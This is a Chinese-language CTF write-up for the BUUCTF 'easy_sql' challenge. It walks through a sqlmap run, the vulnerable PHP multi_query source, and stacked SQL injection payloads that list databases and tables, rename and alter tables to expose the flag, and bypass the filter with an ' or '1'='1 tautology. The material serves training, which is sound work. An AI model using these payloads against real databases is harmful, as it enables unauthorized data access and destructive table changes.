尝试注入发现过滤
preg_match("/select|update|delete|drop|insert|where|\./i",$inject);
/i不区分大小写匹配,也过滤了.
sqlmap跑一波
python sqlmap.py -u "http://web16.buuoj.cn/?inject=3" -v 3 --risk 3 -D supersqli --tables –test-skip=where
能跑出数据库为surpersqli,但是因为过滤where的原因无法得到tables
分析一下源码
链接在这里:
https://github.com/CTFTraining/CTFTraining/blob/master/README.md
easy_sql
取材于某次真实环境渗透,只说一句话:开发和安全缺一不可
multi_query($sql);
if ($res){//使用multi_query()执行一条或多条sql语句
do{
if ($rs = $mysqli->store_result()){//store_result()方法获取第一条sql语句查询结果
while ($row = $rs->fetch_row()){
var_dump($row);
echo "
";
}
$rs->Close(); //关闭结果集
if ($mysqli->more_results()){ //判断是否还有更多结果集
echo "
";
}
}
}while($mysqli->next_result()); //next_result()方法获取下一结果集,返回bool值
} else {
echo "error ".$mysqli->errno." : ".$mysqli->error;
}
$mysqli->close(); //关闭数据库连接
}
?>
$res = $mysqli->multi_query($sql);
发现语句,可能是堆叠注入可以通过;一次性执行多个语句
http://web16.buuoj.cn/?inject=1';show databases;#
测试成功爆出6个数据库
http://web16.buuoj.cn/?inject=1';use supersqli;show tables;#
http://web16.buuoj.cn/?inject=1';show columns from `words`;#
/?inject=222';show columns from `1919810931114514`;#
他既然没过滤 alert 和 rename,那么我们是不是可以把表改个名字,再给列改个名字呢。
先把 words 改名为 words1,再把这个数字表改名为 words,然后把新的 words 里的 flag 列改为 id (避免一开始无法查询)。
这样就可以让程序直接查询出 flag 了。
构造 payload 如下,然后访问,看到这个看来就执行到最后一个语句了。(改表名那里直接从 pma 拷了一个语句过来改- -)
/?inject=1';RENAME TABLE `words` TO `words1`;RENAME TABLE `1919810931114514` TO `words`;ALTER TABLE `words` CHANGE `flag` `id` VARCHAR(100) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL;show columns from words;#
/?inject=1';RENAME TABLE `words` TO `words1`;RENAME TABLE `1919810931114514` TO `words`;ALTER TABLE `words` CHANGE `flag` `id` VARCHAR(100) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL;show columns from words;#collate
用 1′ or ‘1’=’1 访问一下。
/?inject=1%27+or+%271%27%3D%271#
/?inject=1' or '1'='1
可用通过show查到数据库,当前数据库的表,盲注和报错注入也可以获取当前数据库名是supersqli
?inject=';show databases;
?inject=';show tables;
[图片上传中...(image-8d4295-1560508345709-2)]
可以用describe 命令查表有哪些字段
?inject=';describe tablename;
这里的payload不加` 还显示不出来,此时已经可以知道flag的位置了,但是没办法读出来
这时候要把 1919810931114514表里命名成当前的表名words,再用or '1'='1就能查到了
在php层面查询的时候固定语句一般是 select * from words where id = $id这种,数据库里面的变化php是管不到的
改名在mysql中是rename,语法为
rename table `当前表名` to `改后表名`;
但是又因为words中是存在列id,估计查询语句也会根据该字段进行查询,但是装有flag的表里面没有id字段,因此要用alter来添加,语法
alter table `表名` add(字段名 字段类型 NULL) #可为空
我们可以之前通过describe查看words里面的id的字段类型,
是int,所以我们的alert可以写成这样
alter table `1919810931114514` add(id int NULL)
最终的payload如下
`?inject=';alter table `1919810931114514` add(id int NULL);rename table `words` to `tmp`;rename table `1919810931114514` to `words`;
先添加一个叫id字段,可以为空
再把words命名成任意名字
把1919810931114514命名成word
最后用' or '1'='1 显示“当前表”的所有内容就能获取flag
参考:
https://www.zhaoj.in/read-5873.html
https://beiyuouo.github.io/2019/05/30/ctf-buuctf/
https://www.jianshu.com/p/c50ced83414d